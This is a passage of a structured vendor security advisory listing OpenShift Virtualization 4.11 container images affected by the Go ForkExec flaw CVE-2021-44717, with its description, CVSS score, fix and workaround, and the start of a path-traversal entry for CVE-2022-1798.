"8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2030806", }, ], notes: [ { category: "description", text: "There's a flaw in golang's syscall.ForkExec() interface. An attacker who manages to first cause a file descriptor exhaustion for the process, then cause syscall.ForkExec() to be called repeatedly, could compromise data integrity and/or confidentiality in a somewhat uncontrolled way in programs linked with and using syscall.ForkExec().", title: "Vulnerability description", }, { category: "summary", text: "golang: syscall: don't close fd 0 on ForkExec error", title: "Vulnerability summary", }, { category: "other", text: "* This flaw has had the severity level set to Moderate due to the attack complexity required to exhaust file descriptors at the time ForkExec is called, plus an attacker does not necessarily have direct control over where/how data is leaked.\n\n* For Service Telemetry Framework, because the flaw's impact is lower, no update will be provided at this time for its containers.\n\n* runc shipped with Red Hat Enterprise Linux 8 and 9 are not affected by this flaw because the flaw is already patched in the shipped versions.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2021-44717", }, { category: "external", summary: "RHBZ#2030806", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2030806", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2021-44717", url: "https://www.cve.org/CVERecord?id=CVE-2021-44717", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", url: "https://nvd.nist.gov/vuln/detail/CVE-2021-44717", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", url: "https://groups.google.com/g/golang-announce/c/hcmEScgc00k", }, ], release_date: "2021-12-09T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, { category: "workaround", details: "This bug can be mitigated by raising the per-process file descriptor limit.", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "NONE", baseScore: 4.8, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: syscall: don't close fd 0 on ForkExec error", }, { acknowledgments: [ { names: [ "Oliver Brooks and James Klopchic", ], organization: "NCC Group", }, ], cve: "CVE-2022-1798", cwe: { id: "CWE-22", name: "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", }, discovery_date: "2022-08-12T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", 